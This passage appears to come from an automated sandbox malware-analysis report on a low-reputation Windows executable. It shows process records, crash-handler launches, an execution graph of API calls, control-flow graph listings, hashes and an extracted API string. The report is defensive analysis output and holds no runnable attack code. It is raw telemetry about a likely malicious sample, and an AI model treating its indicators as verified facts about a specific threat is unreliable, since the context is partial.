                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                          Imagebase:0x530000
                                                          File size:2'963'456 bytes
                                                          MD5 hash:E6F6B8CEA53E7F4747E424F1617F3393
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:00:52:08
                                                          Start date:14/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924
                                                          Imagebase:0x9d0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:00:52:08
                                                          Start date:14/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1936
                                                          Imagebase:0x9d0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:2.8%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:34.6%
                                                            Total number of Nodes:208
                                                            Total number of Limit Nodes:15
                                                            execution_graph 7528 53d110 7532 53d119 7528->7532 7529 53d2ee 7530 53d2e9 7537 5756e0 7530->7537 7532->7529 7532->7530 7536 542f10 CoInitialize 7532->7536 7540 577180 7537->7540 7539 5756e5 FreeLibrary 7539->7529 7541 577189 7540->7541 7541->7539 7633 54d457 7634 5795b0 LdrInitializeThunk 7633->7634 7635 54d46b 7634->7635 7636 54d4a9 7635->7636 7639 54d4d6 7635->7639 7642 54d47a 7635->7642 7643 5798f0 7635->7643 7636->7639 7636->7642 7647 5799d0 7636->7647 7639->7642 7653 575bb0 LdrInitializeThunk 7639->7653 7641 54d6db 7645 579918 7643->7645 7644 57997e 7644->7636 7645->7644 7654 575bb0 LdrInitializeThunk 7645->7654 7649 5799f5 7647->7649 7648 579b0e 7648->7639 7650 579a5f 7649->7650 7655 575bb0 LdrInitializeThunk 7649->7655 7650->7648 7656 575bb0 LdrInitializeThunk 7650->7656 7653->7641 7654->7644 7655->7650 7656->7648 7817 546f91 7818 546fbc 7817->7818 7819 54702a 7818->7819 7823 575bb0 LdrInitializeThunk 7818->7823 7824 575bb0 LdrInitializeThunk 7819->7824 7822 5470d1 7823->7819 7824->7822 7554 5799d0 7556 5799f5 7554->7556 7555 579b0e 7557 579a5f 7556->7557 7560 575bb0 LdrInitializeThunk 7556->7560 7557->7555 7561 575bb0 LdrInitializeThunk 7557->7561 7560->7557 7561->7555 7825 540b93 7826 573220 RtlFreeHeap 7825->7826 7827 540b99 7826->7827 7692 54111d 7693 575700 2 API calls 7692->7693 7694 541127 7693->7694 7567 54049b 7571 540227 7567->7571 7568 540455 7570 575700 2 API calls 7568->7570 7572 540308 7570->7572 7571->7568 7571->7572 7573 575700 7571->7573 7574 575797 7573->7574 7575 57571b 7573->7575 7576 575729 7573->7576 7577 57578c 7573->7577 7579 573220 RtlFreeHeap 7574->7579 7575->7574 7575->7576 7575->7577 7578 575776 RtlReAllocateHeap 7576->7578 7577->7568 7578->7577 7579->7577 7695 54811b 7700 579b60 7695->7700 7697 54814a 7698 5481ea 7697->7698 7706 575bb0 LdrInitializeThunk 7697->7706 7702 579b85 7700->7702 7701 579c9e 7701->7697 7703 579bef 7702->7703 7707 575bb0 LdrInitializeThunk 7702->7707 7703->7701 7708 575bb0 LdrInitializeThunk 7703->7708 7706->7697 7707->7703 7708->7701 7673 547c84 7674 547c89 7673->7674 7675 573220 RtlFreeHeap 7674->7675 7676 547c96 7675->7676 7731 574a40 7735 574a77 7731->7735 7732 574ad8 7734 574b6d 7732->7734 7740 573e30 7732->7740 7735->7732 7739 575bb0 LdrInitializeThunk 7735->7739 7738 574b29 7738->7734 7744 575bb0 LdrInitializeThunk 7738->7744 7739->7732 7742 573e45 7740->7742 7741 573ed0 7741->7738 7742->7741 7745 575bb0 LdrInitializeThunk 7742->7745 7744->7734 7745->7741 7746 548e0d 7747 548e42 7746->7747 7749 548ea4 7747->7749 7752 575bb0 LdrInitializeThunk 7747->7752 7751 548fa3 7749->7751 7753 575bb0 LdrInitializeThunk 7749->7753 7752->7747 7753->7749 7801 5483ce 7803 548403 7801->7803 7802 54846d 7803->7802 7805 575bb0 LdrInitializeThunk 7803->7805 7805->7803 7665 549809 7668 579410 7665->7668 7667 549848 7669 579430 7668->7669 7670 57954e 7669->7670 7672 575bb0 LdrInitializeThunk 7669->7672 7670->7667 7672->7670 7784 54e30b 7785 54e320 7784->7785 7788 54e34e 7784->7788 7786 573e30 LdrInitializeThunk 7785->7786 7786->7788 7787 54e560 7789 573220 RtlFreeHeap 7787->7789 7788->7787 7791 573e30 LdrInitializeThunk 7788->7791 7790 54e5a2 7789->7790 7794 54e41c 7791->7794 7792 573e30 LdrInitializeThunk 7792->7794 7793 573220 RtlFreeHeap 7793->7794 7794->7787 7794->7792 7794->7793 7795 54e56a 7794->7795 7796 573220 RtlFreeHeap 7795->7796 7796->7787 7709 546536 7712 54655c 7709->7712 7711 5468a4 7711->7711 7713 5732c0 7712->7713 7714 5732f0 7713->7714 7719 57333e 7714->7719 7721 575bb0 LdrInitializeThunk 7714->7721 7716 573220 RtlFreeHeap 7718 573492 7716->7718 7717 5733fe 7717->7716 7718->7711 7719->7717 7719->7718 7722 575bb0 LdrInitializeThunk 7719->7722 7721->7719 7722->7717 7542 53edb5 7543 53edd0 7542->7543 7543->7543 7546 53fca0 7543->7546 7548 53fcdc 7546->7548 7547 53ef70 7548->7547 7550 573220 7548->7550 7551 5732a2 RtlFreeHeap 7550->7551 7552 573236 7550->7552 7553 5732ac 7550->7553 7551->7553 7552->7551 7553->7547 7562 5795b0 7564 5795d0 7562->7564 7563 57970e 7564->7563 7566 575bb0 LdrInitializeThunk 7564->7566 7566->7563 7723 54d93c 7724 5798f0 LdrInitializeThunk 7723->7724 7725 54d952 7724->7725 7797 544b3c 7799 544b40 7797->7799 7798 5542b0 LdrInitializeThunk 7800 545a97 7798->7800 7799->7798 7799->7800 7760 546ebf 7764 546a52 7760->7764 7762 573220 RtlFreeHeap 7762->7764 7764->7760 7764->7762 7765 573630 7764->7765 7769 575bb0 LdrInitializeThunk 7764->7769 7766 5736be 7765->7766 7767 573640 7765->7767 7766->7764 7767->7766 7770 575bb0 LdrInitializeThunk 7767->7770 7769->7764 7770->7766 7580 542fe0 7582 542ffa 7580->7582 7581 543377 7582->7580 7582->7581 7583 573220 RtlFreeHeap 7582->7583 7584 5434cc 7582->7584 7583->7582 7601 559510 7584->7601 7586 543674 7609 559bb0 7586->7609 7602 55956e 7601->7602 7602->7602 7613 579760 7602->7613 7604 5598f7 7606 559908 7604->7606 7617 556cc0 7604->7617 7606->7586 7607 559768 7607->7604 7607->7606 7608 579760 LdrInitializeThunk 7607->7608 7608->7604 7610 559c51 7609->7610 7626 5542b0 7610->7626 7612 559e05 7614 579780 7613->7614 7615 57989e 7614->7615 7620 575bb0 LdrInitializeThunk 7614->7620 7615->7607 7621 5795b0 7617->7621 7619 556d15 7620->7615 7623 5795d0 7621->7623 7622 57970e 7622->7619 7623->7622 7625 575bb0 LdrInitializeThunk 7623->7625 7625->7622 7627 5542c0 7626->7627 7628 579760 LdrInitializeThunk 7627->7628 7630 554319 7628->7630 7629 5543d7 7629->7612 7630->7629 7631 556cc0 LdrInitializeThunk 7630->7631 7631->7629 7771 54d760 7772 54d773 7771->7772 7773 5795b0 LdrInitializeThunk 7772->7773 7774 54d92d 7773->7774 7809 543be2 7810 543be9 7809->7810 7811 543ea3 7810->7811 7814 543e36 7810->7814 7815 575bb0 LdrInitializeThunk 7810->7815 7811->7814 7816 575bb0 LdrInitializeThunk 7811->7816 7815->7811 7816->7814 7726 573920 7727 57393c 7726->7727 7728 573a42 7727->7728 7730 575bb0 LdrInitializeThunk 7727->7730 7730->7728 7632 542f6f CoInitializeSecurity 7754 540228 7755 540455 7754->7755 7758 540242 7754->7758 7759 540308 7754->7759 7757 575700 2 API calls 7755->7757 7756 575700 2 API calls 7756->7755 7757->7759 7758->7755 7758->7756 7758->7759 7677 5468ab 7678 5468aa 7677->7678 7678->7677 7680 5734d0 7678->7680 7681 57359e 7680->7681 7682 5734e1 7680->7682 7681->7678 7682->7681 7684 575bb0 LdrInitializeThunk 7682->7684 7684->7681

                                                            Executed Functions

                                                            Function 0053FCA0 Relevance: 6.6, Strings: 5, Instructions: 373COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 236 53fca0-53fcda 237 53fd0b-53fe22 236->237 238 53fcdc-53fcdf 236->238 240 53fe24 237->240 241 53fe5b-53fe8c 237->241 239 53fce0-53fd09 call 542690 238->239 239->237 245 53fe30-53fe59 call 542760 240->245 242 53feb6-53fec5 call 540b50 241->242 243 53fe8e-53fe8f 241->243 252 53feca-53fecf 242->252 246 53fe90-53feb4 call 542700 243->246 245->241 246->242 254 53fed5-53fef8 252->254 255 53ffe4-53ffe6 252->255 257 53ff2b-53ff2d 254->257 258 53fefa 254->258 256 5401b1-5401bb 255->256 260 53ff30-53ff3a 257->260 259 53ff00-53ff29 call 5427e0 258->259 259->257 261 53ff41-53ff49 260->261 262 53ff3c-53ff3f 260->262 264 5401a2-5401ad call 573220 261->264 265 53ff4f-53ff76 261->265 262->260 262->261 264->256 267 53ffab-53ffb5 265->267 268 53ff78 265->268 271 53ffb7-53ffbb 267->271 272 53ffeb 267->272 270 53ff80-53ffa9 call 542840 268->270 270->267 276 53ffc7-53ffcb 271->276 274 53ffed-53ffef 272->274 277 53fff5-54002c 274->277 278 54019a 274->278 276->278 280 53ffd1-53ffd8 276->280 281 54002e-54002f 277->281 282 54005b-540065 277->282 278->264 283 53ffda-53ffdc 280->283 284 53ffde 280->284 285 540030-540059 call 5428a0 281->285 286 5400a4 282->286 287 540067-54006f 282->287 283->284 288 53ffc0-53ffc5 284->288 289 53ffe0-53ffe2 284->289 285->282 290 5400a6-5400a8 286->290 292 540087-54008b 287->292 288->274 288->276 289->288 290->278 293 5400ae-5400c5 290->293 292->278 295 540091-540098 292->295 296 5400c7 293->296 297 5400fb-540102 293->297 298 54009e 295->298 299 54009a-54009c 295->299 300 5400d0-5400f9 call 542900 296->300 301 540104-54010d 297->301 302 540130-54013c 297->302 303 540080-540085 298->303 304 5400a0-5400a2 298->304 299->298 300->297 306 540117-54011b 301->306 307 5401c2-5401c7 302->307 303->290 303->292 304->303 306->278 309 54011d-540124 306->309 307->264 310 540126-540128 309->310 311 54012a 309->311 310->311 312 540110-540115 311->312 313 54012c-54012e 311->313 312->306 314 540141-540143 312->314 313->312 314->278 315 540145-54015b 314->315 315->307 316 54015d-54015f 315->316 317 540163-540166 316->317 318 5401bc 317->318 319 540168-540188 call 542030 317->319 318->307 322 540192-540198 319->322 323 54018a-540190 319->323 322->307 323->317 323->322
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J|BJ$V$VY^_$eY.z8bZweqIPgKfpYDlsN4_L2R0LQF9aLZkPSL_aagI-1728881527-0.0.1.1-/api$t
                                                            • API String ID: 0-3830073232
                                                            • Opcode ID: 4ab2569b078e08f3bdac09cde3d3b1569e5867833a33ef7af0dcc19dc5a954af
                                                            • Instruction ID: 6f9484ef2169308b76d53bac4a5d0a0fab6b706266b8d33ec5ed4e69daacb92e
                                                            • Opcode Fuzzy Hash: 4ab2569b078e08f3bdac09cde3d3b1569e5867833a33ef7af0dcc19dc5a954af
                                                            • Instruction Fuzzy Hash: 9BD1767450C3909BD310DF14989466FBFE1BB96B48F68981CF9C99B252C336CD09DB92
                                                            Function 00575700 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 340 575700-575714 341 575797-5757a5 call 573220 340->341 342 5757b2 340->342 343 5757b0 340->343 344 57578c-575795 call 5731a0 340->344 345 57571b-575722 340->345 346 575729-57574a 340->346 341->343 347 5757b4-5757b9 342->347 343->342 344->347 345->341 345->342 345->343 345->346 348 575776-57578a RtlReAllocateHeap 346->348 349 57574c-57574f 346->349 348->347 352 575750-575774 call 575b30 349->352 352->348
                                                            APIs
                                                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00575784
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: bc0e20e0d9f188b5a9a7395f0c5fce4e9c8f5bb7e956714210a25e24355264e6
                                                            • Instruction ID: 8f4fd8257fa0a2fbd1d2dfe31f0c3702e369c3eb71c31e877b736ebef268d55e
                                                            • Opcode Fuzzy Hash: bc0e20e0d9f188b5a9a7395f0c5fce4e9c8f5bb7e956714210a25e24355264e6
                                                            • Instruction Fuzzy Hash: F711917591C240EBC305AF28F845A1BBFF5EF96710F058828E8C89B212E335D814EB93
                                                            Function 0054049B Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 397 54049b-540515 call 53c9f0 401 540356 397->401 402 540417-540430 397->402 403 540370-54037e 397->403 404 5403d0-5403d7 397->404 405 540311-540332 397->405 406 540472-540477 397->406 407 540393-540397 397->407 408 54051c-54051e 397->408 409 5403be 397->409 410 5403de-5403e3 397->410 411 54035f-540367 397->411 412 540339-54034f 397->412 413 54045b-540469 call 575700 397->413 414 5403fb-540414 397->414 415 540246-540260 397->415 416 540386-54038c 397->416 417 540227-54023b 397->417 418 540440-540458 call 575700 397->418 419 540480 397->419 420 540242-540244 397->420 421 540482-540484 397->421 422 5403ec-5403f4 397->422 423 540308-54030c 397->423 401->411 402->418 403->416 404->402 404->406 404->407 404->410 404->414 404->416 404->419 404->421 404->422 405->401 405->402 405->403 405->404 405->406 405->407 405->409 405->410 405->411 405->412 405->413 405->414 405->416 405->418 405->419 405->421 405->422 406->419 431 5403a0-5403b7 407->431 424 540520-540b30 408->424 409->404 410->422 411->403 412->401 412->402 412->403 412->404 412->406 412->407 412->409 412->410 412->411 412->413 412->414 412->416 412->418 412->419 412->421 412->422 413->406 414->402 426 540294 415->426 427 540262 415->427 416->406 416->407 416->419 416->421 417->401 417->402 417->403 417->404 417->405 417->406 417->407 417->409 417->410 417->411 417->412 417->413 417->414 417->415 417->416 417->418 417->419 417->420 417->421 417->422 417->423 418->413 425 540296-5402bd 420->425 429 54048d-540496 421->429 422->406 422->407 422->414 422->419 422->421 423->429 433 5402bf 425->433 434 5402ea-540301 425->434 426->425 432 540270-540292 call 542eb0 427->432 429->424 431->402 431->404 431->406 431->407 431->409 431->410 431->413 431->414 431->416 431->418 431->419 431->421 431->422 432->426 443 5402c0-5402e8 call 542e70 433->443 434->401 434->402 434->403 434->404 434->405 434->406 434->407 434->409 434->410 434->411 434->412 434->413 434->414 434->416 434->418 434->419 434->421 434->422 434->423 443->434
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
